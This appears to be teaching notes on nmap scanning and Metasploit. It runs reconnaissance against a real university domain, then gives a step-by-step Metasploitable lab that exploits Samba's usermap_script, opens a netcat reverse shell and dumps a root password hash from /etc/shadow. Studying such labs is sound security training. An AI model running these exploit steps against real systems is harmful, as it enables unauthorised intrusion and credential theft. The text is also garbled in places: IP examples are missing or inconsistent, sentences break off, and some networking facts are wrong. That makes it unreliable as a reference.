Network Exploitation - nmap and Metasploit
Finding a target device to attack depends on the hacker’s objectives and may be opportunistic or targeted.
Either way, the first step in remote exploitation is to discover the target and gather After all, one cannot exploit a host that does not exist! The next step consists of gathering public information about the target, including what ports are open and which applications are available over the network.
Recall an IPv4 address is specified by 4 bytes (32 bits), constituting an integer value between
2^32-1. Typically an IP address is written as four base-10 octets
XXX are in the range
0..255. For example, the IP address of
184.108.40.206. The University of Western Ontario, however, administers many hosts… an entire network in fact.
- Class A: A network specified by the top byte (8 bits), i.e., the range
- Class B: A network specified by the top two bytes (16 bits), i.e., the range
- Class C: A network specified by the top three bytes (24 bits), i.e., the range
We can use the CIDR notation to specify a network range. An IP range in this notation has the form
YY is an integer in the range
0..32 specifying how many of the top bits of the IP address are fixed.
Here are some examples:
220.127.116.11/24would specify the class C network that
18.104.22.168/16would specify the class B network that
22.214.171.124/32would specify the the single host that
2^(32-29)=8hosts “closest” to
126.96.36.199/0specifies the entire internet!
Suppose a penetration tester is hired to perform an evaluation of a The University of Western Ontario. The permission to conduct this evaluation (if it were for real) would obviously exist between the tester and Western, so the tester would first want to confirm which IP addresses belong to Western.
They can start by gathering basic public information about the domain
uwo.ca from the ARIN:
$ whois uwo.ca Domain name: uwo.ca Domain status: registered Creation date: 2000/10/13 Expiry date: 2020/01/12 Updated date: 2010/10/15 DNSSEC: Unsigned Registrar: Name: Webnames.ca Inc. Number: 70 Registrant: Name: The University of Western Ontario Administrative contact: Name: Jeff Grieve Postal address: Support Services Building Rm 4359 London ON N6A3K7 Canada Phone: +1.5196612151 Fax: +1.5196613486 Email: email@example.com Technical contact: Name: Ed Gibson Postal address: Support Services Building rm 4300 London ON N6A3K7 Canada Phone: +1.5196612151 Fax: +1.5196613486 Email: firstname.lastname@example.org Name servers: ns1.uwo.ca 188.8.131.52 ns2.uwo.ca 184.108.40.206 ns3.uwo.ca 220.127.116.11
Next the tester should confirm the IP range owned by Western. This is crucial for the tester not only to narrow their search space, but also to ensure they do not try to hack into a host without permission. Even if the company states its IP range in the contract, the tester would want to confirm it.
The tester might first seek to determine the IP address of the company’s main website:
$ nslookup uwo.ca Server: 18.104.22.168 Address: 22.214.171.124#53 Non-authoritative answer: Name: uwo.ca Address: 126.96.36.199
uwo.ca has IP address
188.8.131.52. Next we can consult the Whois database to get information about the owner of this address:
Here we see Western owns a class B network consisting of IPs in the range
184.108.40.206. We also see that Western registered
uwo.ca in 1987, several years before the web was even invented! Of course they were actively using email and FTP and other early internet services.
A port is a software abstraction Just as IP addresses are used to identify machines on a network, ports identify specific applications running on a machine.
Ports can range in value from
Ports in the range
1023 are reserved ports, and Unix systems require applications have root privileges to bind to these ports. This gives visitors to a site some assurance they are connecting to a valid system service initiated by the system administrator, and not some unprivileged user. For example, the typical port for
nmap is a well known network scanning tool for discovering hosts and services. It has a wide range of scanning methods and plugins.
Passive Host Discovery
Passive scans are a good place to start gathering basic information about a host. They have the of benefit of being stealthy as they do not contact the host.
Using nmap you can use the
-sL “list scan” option to do reverse-DNS lookups on neighboring IP addresses. For example:
$ nmap -sL www.uwo.ca/24
will tell you the host names of all the hosts on the class A network shared by
uwo.ca. This will potentially allow us to discover interesting host names, such as this one:
Nmap scan report for owl.uwo.ca (220.127.116.11)
Active Host Discovery
Active scans are less stealthy than passive scans since they actually directly contact the host. This however allows you to gain more information that you could with a passive scan alone, such as if the host is even currently online.
-sn option in nmap performs basic host detection (i.e., skips the more detailed port scan).
$ nmap -sn <IP or hostname>/<mask>
The IANA maintains a number of special use domains for the purposes of basic illustrative examples in documents. One such domain is
example.com, which you can use to provide another concrete example of nmap’s basic use:
$ nmap -sn example.com Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST Nmap scan report for example.com (18.104.22.168) Host is up (0.023s latency). Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds
Port scanning can used to gain information about what kinds of software and services might be available on a host. Without specifying any options, nmap will do an initial host discovery followed by a basic port scan,
$ nmap example.com Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:45 EST Nmap scan report for example.com (22.214.171.124) Host is up (0.022s latency). Not shown: 993 filtered ports PORT STATE SERVICE 53/tcp closed domain 80/tcp open http 443/tcp open https 554/tcp closed rtsp 1119/tcp closed bnetgame 1755/tcp closed wms 1935/tcp closed rtmp
Similarly you can use this command to discover hosts and services on your home network, substitute your internal network IP range. First you need to find your own device’s IP address, which you can do in a terminal:
$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.3 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 8f80::a28:23af:fe71:b4af prefixlen 64 scopeid 0x20<link> ether 4b:42:7f:45:ac:ad txqueuelen 1000 (Ethernet) RX packets 71 bytes 15823 (15.4 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 16 bytes 2304 (2.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Here our IP address is
192.168.1.3 so we can proceed to scan the home network, i.e.
192.168.1.255 using any number of equivalent commands including:
nmap 192.168.1.0/24 nmap 192.168.1.3/24 nmap 192.168.1.*
-sV option performs version detection of the services. This doesn’t always work, especially if the sys admins have taken steps to obfuscate it. In other cases we can learn which server version and OS the target is running. For example, we see
eng.uwo.ca is running Windows:
$ nmap -sV eng.uwo.ca Starting Nmap 5.51 ( http://nmap.org ) at 2016-02-21 15:49 EST Nmap scan report for eng.uwo.ca (126.96.36.199) Host is up (0.0026s latency). rDNS record for 188.8.131.52: ebithp8.eng.uwo.ca Not shown: 992 filtered ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 80/tcp open http Microsoft IIS httpd 7.0 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 7937/tcp open rpcbind 7938/tcp open rpcbind 8089/tcp open rpcbind 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows
-A option prints a more detailed information about services, and used with the
-sS option it can be reasonably fast. Metasploitable for example is made purposefully vulnerable to facilitate pen-testing education). For example, this would reveal that it is running Ubuntu on Apache 2.2.8:
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux
Metasploit and Metasploitable
Metasploit is a customizable exploitation framework for penetration testing. It provides a (somewhat) easy to use interface for managing and deploying exploits. Metasploitable is an intentionally vulnerable version of Linux which allows us to explore exploitation techniques in a sandboxed environment.
Virtual Pen-Testing Lab
Step 1: Host Discovery
The first step will be for us to discover available hosts:
$ nmap -sn 192.168.1.1/29 Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:32 EST Nmap scan report for 192.168.1.1 Host is up (0.00026s latency). MAC Address: 08:00:27:CB:C4:14 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.1.2 Host is up (0.00020s latency). MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC)
Here we see a host available at
Step 2: Port Scanning
Next we can scan
192.168.1.2 to explore its port configuration. In particular we’d like to get a little more detailed information about what application versions are running so we’ll use the
$ nmap -sV 192.168.1.2 Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-22 10:33 EST Nmap scan report for 192.168.1.2 Host is up (0.00015s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION ... <additional results> ... 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) MAC Address: 08:00:27:C7:57:72 (Oracle VirtualBox virtual NIC) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Metasploitable is configured to have many ports open (to allow many possible avenues for exploitation). In particular we notice port
139 is running
Samba 3.X. Interesting. You look up Samba on Wikipedia and read that:
Some versions of Samba 3.6.3 and lower suffer serious security issues which can allow anonymous users to gain root access to a system from an anonymous connection.
Step 3: Exploit
- Initialize the Metasploit database and start the
$ service postgresql start $ msfdb init $ msfconsole
Next check to make sure that the database has connected. Typing:
msf > db_status
[*] postgresql connected to msf3
The first time you run Metasploit, you should build the database cache to allow for faster searching:
msf > db_rebuild_cache
This may take 5-10 minutes, so grab a coffee, and restart
msfconsole when you come back.
Next we want to search for Samba related exploits:
msf > search samba Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- ... exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
Here see see an Excellent-ranked Samba exploit which we can use. Next we load the exploit:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic
We see that this exploit requires us to specify
RHOST, i.e., the remote host’s IP address, and
RPORT the target port.
msf exploit(usermap_script) > set LHOST 192.168.1.3 LHOST => 192.168.1.3 msf exploit(usermap_script) > set LPORT 666 LPORT => 666 msf exploit(usermap_script) > set RHOST 192.168.1.2 RHOST => 192.168.1.2 msf exploit(usermap_script) > set RPORT 139 RPORT => 139 msf exploit(usermap_script) > set TARGET 0 TARGET => 0
Step 4: Payload
Now that the exploit is configured and ready, the final step is to specify the payload, i.e., the malicious code we wish to deliver via the exploit. We need to see which payloads are compatible by typing:
msf > show payloads
to receive a list. We’re going to use a
netcat based reverse TCP shell:
msf > set payload cmd/unix/reverse_netcat
Now we’re ready to go:
msf exploit(usermap_script) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.3:666 msf exploit(usermap_script) > [*] Command shell session 1 opened (192.168.1.3:666 -> 192.168.1.2:38741) at 2016-02-22 12:08:50 -0500
Now if we type
sessions we get
Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell unix 192.168.1.3:666 -> 192.168.1.2:38741 (192.168.1.2)
So now we want to bind to the active session:
msf exploit(usermap_script) > sessions -i 1 [*] Starting interaction with 1...
After a few moments you will be able to type commands!
cat /etc/shadow root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
- NixCraft Top 30 Nmap Command Examples For Sys/Network Admins
- Metasploit tutorial for beginners
- Metasploit Unleased, a free online course on penetration testing using Metasploit.